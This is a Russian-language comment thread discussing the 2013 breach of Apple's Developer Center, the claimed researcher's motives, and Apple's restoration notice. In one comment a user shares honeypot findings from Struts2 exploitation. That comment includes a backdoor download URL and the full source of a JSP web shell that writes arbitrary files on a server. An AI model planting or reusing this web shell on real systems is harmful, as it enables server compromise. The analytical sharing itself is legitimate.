Специалист по безопасности рассказал о взломе Apple Developer Center

[@Iktash]

И все это «только чтобы проверить как глубоко я смогу проникнуть»

А потом сохранил у себя всю базу «только что бы проверить как долго этого никто не заметит».

[@mOlind]

Вот и мне показалось что это он прикидывается так чтобы его не засудили за «исследования».

[@brainplus]

Все-таки с четверга держать сайт в дауне — как-то сурово.

[@valiorik]

Монополия, могут делать что хотят, у разработчиков нет выбора кроме как пользоваться сервисом Яблока.

[@RussDragon]

Так я не совсем понял, разве он получил доступ к паролям? Видео сейчас посмотреть не могу, если там это описывается.
UPD: Круто. Видео с ограниченным доступом.

[@newdya]

Правильно он пишется İbrahim Baliç — Ибрахим Балич, он турок.

[@Lilumi]

не уверен на 100% но странное совпадение:
— вчера обнаружил что в моем твиттере появились левые твиты, которые я явно не публиковал
— сегодня узнал, что Apple dev Center взломан и как раз пароль и емейл от твиттера были такими же, как и пароль и емейл от apple dev center

[@d00kie]

Кстати, вероятно чувак гонит и хочет ПР себе. 16 числа Struts2 опубликовал адвайзори, и китайские ребята сделали паблик сплойт и начали сканить интернет. к вечеру 17го числа, большинство тех, кто не успел запатчится — поимели Китайские товарищи. Ессно таких сайтов дофига. Например я точно заняю, что. например Qiwi был уязвим, а на следующий день они пофиксили багу — взломали их или они сами успели — вопрос. И на самом деле взломанных ресурсов очень много, все что на Struts2. Сейчас в инете полно не патченных кстати 8) Так что вполне могли до этого-спер ресерчера сломать. Короче обычные были скрипт-кидди, так как например в моих логах отпечатки эксплойта прямо с форума, где тот был опубликован — без изменений.

Например на хонипоте было — бекдор качали отсюда — data.blackbap.org/a.txt. Щас пусто, но это один из примеров… тело бекдора:

<%@ page language="java" pageEncoding="gbk"%>
<jsp:directive.page import="java.io.File"/>
<jsp:directive.page import="java.io.OutputStream"/>
<jsp:directive.page import="java.io.FileOutputStream"/>
<% int i=0;String method=request.getParameter("act");if(method!=null&&method.equals("yoco")){String url=request.getParameter("url");String text=request.getParameter("smart");File f=new File(url);if(f.exists()){f.delete();}try{OutputStream o=new FileOutputStream(f);o.write(text.getBytes());o.close();}catch(Exception e){i++;%>
error
<%}}if(i==0){%>
ok
<%}%>
<form action='?act=yoco' method='post'><input size="100" value="<%=application.getRealPath("/") %>" name="url"><br><textarea rows="20" cols="80" name="smart">

[@d00kie]

kuxoo.com/archives/260/ < — для скрипт кидди…

[@TerAnYu]

Восстановили:

Apple Developer System Status Update

We apologize for the significant inconvenience caused by our developer website downtime. We've been working around the clock to overhaul our developer systems, update our server software, and rebuild our entire database. While we complete the work to bring our systems back online, we want to share the latest with you.

We plan to roll out our updated systems, starting with Certificates, Identifiers & Profiles, Apple Developer Forums, Bug Reporter, pre-release developer libraries, and videos first. Next, we will restore software downloads, so that the latest betas of iOS 7, Xcode 5, and OS X Mavericks will once again be available to program members. We'll then bring the remaining systems online. To keep you up to date on our progress, we've created a status page to display the availability of our systems.

If your program membership is set to expire during this period, it will be extended and your app will remain on the App Store. If you have any other concerns about your account, please contact us.

Thank you for your continued patience.

[@mOlind]

Потихоньку восстанавливают. В настоящий момент работают только iTunes Connect и Bug Reporter. В тексте, что вы процитировали, линка приведена на страницу, на которой можно смотреть статус, что уже работает: developer.apple.com/support/system-status/